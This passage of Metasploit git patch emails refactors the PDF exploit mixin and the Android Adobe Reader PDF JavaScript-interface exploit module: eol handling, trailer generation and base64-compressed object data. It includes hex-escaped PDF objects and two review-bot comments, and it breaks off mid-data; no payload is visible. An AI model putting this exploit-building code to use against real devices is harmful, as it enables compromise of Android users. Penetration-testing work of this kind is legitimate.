"\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") - - @xref_offset = @pdf.length - @pdf << xref_table << trailer(25, eol) << startxref - - @pdf - end end end From 9f5dfab9ea05e02a1ac92540233adca412fb873d Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 16:14:52 -0500 Subject: [PATCH 460/853] Add better interface for specifying custom #eol. --- lib/msf/core/exploit/pdf.rb | 4 ++++ .../android/fileformat/adobe_reader_pdf_js_interface.rb | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 19b9a9204a..3cf02f4bee 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb 
@@ -206,6 +206,10 @@ module Exploit::PDF @eol || "\x0d\x0a" end + def eol=(new_eol) + @eol = new_eol + end + def endobj "endobj" << eol end diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 9f1dd2c4c1..b5d44669f6 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def pdf(js) - @eol = "\x0d" + self.eol = "\x0d" @xref = {} @pdf = header('1.6') From cf6b1819597f71df65e3e0e269d54046f5f6f346 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 17:47:54 -0500 Subject: [PATCH 461/853] Revert change to trailer(). Kill dead method. * I verified that changes to PDF mixin do not affect any older modules that generate PDF. I did this by (on each branch) running in irb, then running the module and diffing the pdf's generated by each branch. There were no changes. --- lib/msf/core/exploit/pdf.rb | 11 +++-------- .../fileformat/adobe_reader_pdf_js_interface.rb | 7 ++++++- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 3cf02f4bee..1a1bcc8528 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -160,11 +160,6 @@ module Exploit::PDF @pdf << endobj end - def range_rand(min,max) - until min < r=rand(max); end - return r - end - def finish_pdf @xref_offset = @pdf.length @pdf << xref_table @@ -190,9 +185,9 @@ module Exploit::PDF ret end - def trailer(root_obj, space='') - id = @xref.keys.max+1 - "trailer" << space << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol + def trailer(root_obj) + ret = "trailer" << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj) << ">>" << eol + ret end def startxref 
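Review bot: The new `eol=` writer in `Exploit::PDF` (hunk `@@ -206,6 +206,10 @@`) has no comment saying when it has to be called, and it is a hand-written equivalent of `attr_writer :eol`. The reader shown as context falls back to `"\x0d\x0a"` only while `@eol` is unset, so a one-line comment such as `# Override the line terminator (default "\x0d\x0a"); set it before any output is generated` would document the contract. Whether the mixin's other output helpers already read `eol` is not visible in this hunk, so the ordering advice should be confirmed. The companion hunk in the module replaces `@eol = "\x0d"` with `self.eol = "\x0d"`, which matches the intended use.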
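Review bot: The restored `trailer` in `lib/msf/core/exploit/pdf.rb` (hunk `@@ -190,9 +185,9 @@`) computes `/Size` as `@xref.length + 1`, which equals the highest object number plus one only when objects were added with contiguous numbers starting at 1. The Android module in this same commit redefines `trailer` with `@xref.keys.max+1`, presumably because it adds objects by explicit, out-of-order number. The mixin's assumption therefore deserves a comment, for example `# /Size assumes contiguous object numbers; override trailer when numbering is sparse`. The `ret = ...` / `ret` pair can also collapse to the bare expression without changing the output. The `def startxref` context line after the change belongs to a method that continues outside the hunk.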
diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index b5d44669f6..aaaa7d3184 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -71,6 +71,11 @@ class Metasploit3 < Msf::Exploit::Remote file_create(pdf(js)) end + def trailer(root_obj) + id = @xref.keys.max+1 + "trailer" << eol << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol + end + def pdf(js) self.eol = "\x0d" @xref = {} @@ -119,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") @xref_offset = @pdf.length - @pdf << xref_table << trailer(25, eol) << startxref + @pdf << xref_table << trailer(25) << startxref @pdf end From 04ac07a2164bbecf700a89078eba21562082eebb Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Mon, 2 Jun 2014 23:06:46 -0500 Subject: [PATCH 462/853] Compress and base64 data to save bytes. Reduced file size from 43kb to 12kb, yay. --- .../adobe_reader_pdf_js_interface.rb | 78 ++++++++++--------- 1 file changed, 41 insertions(+), 37 deletions(-) diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index aaaa7d3184..f3e6c6c124 100644 
--- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb 
@@ -76,52 +76,56 @@ class Metasploit3 < Msf::Exploit::Remote "trailer" << eol << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol end + def add_compressed(n, data) + add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data))) + end + def pdf(js) self.eol = "\x0d" @xref = {} @pdf = header('1.6') - add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") - add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(3, 
"\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e
\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x
d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x2
0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\
x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x2